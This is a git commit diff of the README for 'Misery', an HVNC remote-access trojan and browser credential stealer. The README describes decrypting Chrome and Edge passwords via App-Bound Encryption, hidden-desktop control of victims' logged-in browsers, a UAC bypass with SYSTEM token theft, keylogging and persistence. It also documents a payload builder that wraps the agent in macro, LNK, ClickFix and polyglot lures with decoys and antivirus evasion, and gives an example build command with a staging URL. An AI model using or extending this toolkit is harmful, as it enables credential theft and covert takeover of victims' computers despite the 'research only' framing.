docs: demo gif, readme rewrite, loopback examples, gitignore console history

This commit is contained in:
JYenn
2026-08-16 22:07:01 +01:00
parent a095619ba4
commit c458ffd065
4 changed files with 42 additions and 16 deletions
+37 -14
View File
@@ -6,7 +6,13 @@
<em>a devoted sister of the Church of Malware</em>
</p>
HVNC RAT and stealer research project, derived from Misery. For local testing and research only.
An HVNC RAT and stealer, derived from the 2023-era Creal stealer and rebuilt for Chrome's App-Bound Encryption. Chrome 127+ moved credential decryption behind ABE, a COM service running as the browser user. The agent walks that COM object in-process via indirect syscalls, so nothing credential-shaped ever touches disk. ABE research is all [xaitax](https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption). Local testing and research only.
## Demo
<p align="center">
<img src="demo.gif" alt="Misery demo" width="100%">
</p>
## Features
@@ -19,9 +25,25 @@ HVNC RAT and stealer research project, derived from Misery. For local testing an
- **Payload builder** (`setup.py`): msfvenom-style config, ECDH key handling, and `-p` delivery wrappers for `docm`, `xlsm`, `lnk`, `pdf`, `html`, `clickfix_html`, `iso`, `polyglot_exe_zip`, and `polyglot_html`
- **Keylogger and clipboard monitoring**
- **Persistence**: HKCU Run key and WMI event subscriptions
- **Elevation** (`elevate`): silent UAC bypass to High via PEB masquerade and CMSTPLUA/ICMLuaUtil, then SYSTEM through SeDebug token theft from a non-PPL system process. Verified on Windows 11 25H2 (build 26200)
- **Elevation** (`elevate`): silent UAC bypass to High, then SYSTEM via SeDebug token theft
- **Anti-analysis**: user-mode environment checks, reflective injection
## How it works
- **Channel**: the console holds the private half of an ECDH P-256 keypair in `.misery_key`; the agent only ever ships the public half. Every session derives a fresh AES-256-GCM key from the handshake, so no key material repeats across bots.
- **Stealing**: spawn a suspended Chrome or Edge, inject the payload DLL in-process, and walk the ABE COM object to decrypt the stored credentials. No disk write, and the browser never visibly opens.
- **HVNC**: `hvnc start` runs GDI apps on a hidden desktop and streams frames to the operator view. `ghost <url>` drives a real Chromium over CDP, logged into the victim's profiles; the browser is basically them.
- **Elevation**: relaunch as admin via PEB masquerade and CMSTPLUA/ICMLuaUtil, then SYSTEM through SeDebug token theft from a non-PPL process.
- **Delivery**: `setup.py -p` wraps the agent into 9 file formats; only the stage URL and agent filename are injected at build time.
## Tested On
| Target | Version |
|---|---|
| Google Chrome | `150.0.7871.187` |
| Microsoft Edge | `151.0.4129.59` |
| Elevation chain | Windows 11 25H2 (build 26200) |
<p align="center">
<img src="MiseryOperatorView.png" alt="Misery operator view" width="1000">
</p>
@@ -57,8 +79,8 @@ filetypes in `dist/` and records each one in `<out>.manifest.json` with its
sha256 and size. `python setup.py --list-formats` prints the current list with
dependencies.
- `docm` - Word macro document; `Document_Open` shells a hidden cmd/curl download-and-run. The macro comes from a Word-authored compiled base (`wrappers_bases/docm_base.docm`); only the stage URL and agent filename are injected as document variables and read at open time, because rebuild-generated macro streams open without auto-event hooks (verified live 2026-08)
- `xlsm` - Excel macro workbook; `Workbook_Open` shells a hidden cmd/curl download-and-run. Same design: an Excel-authored compiled base (`wrappers_bases/xlsm_base.xlsm`) with the runtime values in a hidden `cfg` sheet
- `docm` - Word macro document; `Document_Open` shells a hidden cmd/curl download-and-run from a compiled base (`wrappers_bases/docm_base.docm`)
- `xlsm` - Excel macro workbook; `Workbook_Open` shells the same chain from a compiled base (`wrappers_bases/xlsm_base.xlsm`); runtime values live in a hidden `cfg` sheet
- `lnk` - shortcut plus companion `.cmd`; the LNK probes Downloads/Desktop for the `.cmd`, which opens a decoy PDF then fetches and runs the agent (the chain lives in the `.cmd` because Defender's FastPath flags any LNK-launched curl download cmdline)
- `pdf` - agent embedded as a PDF attachment, launched on open
- `html` - OneDrive-style page; the agent hides in a zip blob behind a button click
@@ -68,7 +90,7 @@ dependencies.
- `polyglot_html` - runs as an exe, shows a decoy page in a browser
```powershell
python setup.py -t tcp LHOST=10.0.0.5 LPORT=4444 -p docm,iso -o misery STAGE_URL=http://10.0.0.5:8080/misery.exe
python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 -p docm,iso -o misery STAGE_URL=http://127.0.0.1:8080/misery.exe
```
`-p all` builds every format. The macro, lnk, clickfix, and polyglot_exe_zip
@@ -77,15 +99,12 @@ iso, and polyglot_html carry the agent themselves. The macro files ship with
decoy content, and the lnk/pdf formats show a decoy document, so they read as
normal business documents instead of empty templates.
The docm and xlsm bases are compiled by Word/Excel themselves so the
`Document_Open` / `Workbook_Open` hooks actually fire: pyopenvba-style
rebuilds write source-only module streams that Office opens in a degraded
state where the auto-events never run (reproduced and root-caused live
2026-08). The wrapper copies the base, fills decoy content, and injects the
per-build values (Word docvars in `word/settings.xml`, Excel cfg-sheet cells
in `xl/sharedStrings.xml`); the pre-compiled VBA builds the download chain
from Chr()-encoded parts plus those values at open time, so no macro stream
is ever rewritten.
The docm/xlsm wrappers copy the Office-compiled base (`wrappers_bases/`), fill
decoy content, and inject per-build values — Word docvars in `word/settings.xml`,
Excel cfg-sheet cells in `xl/sharedStrings.xml` — so the pre-compiled VBA
assembles the download chain at open time without rewriting any macro stream.
They're compiled by Office itself because pyopenvba-style rebuilds leave the
auto-events unhooked (root-caused live 2026-08).
The lnk and polyglot_exe_zip fetch their decoy PDF from the same directory as
`STAGE_URL`, so host the generated `<out>.cmd` and `<out>.decoy.pdf` next to
@@ -164,6 +183,10 @@ A fresh checkout builds against `127.0.0.1:4444`. Run `setup.py` once so `.miser
- `wrappers_bases/`: Office-authored compiled macro bases used by the docm/xlsm wrappers
- `build/`: out-of-source build dir
Love all you killas. Stay sharp. ♱
If you save passwords in a browser, stop: use a password manager, keep work infra on dedicated logins, and disable sites saving data. Wipe cookies on exit.
## Licence
No licence granted. Research code for study only; not licensed for redistribution or commercial use.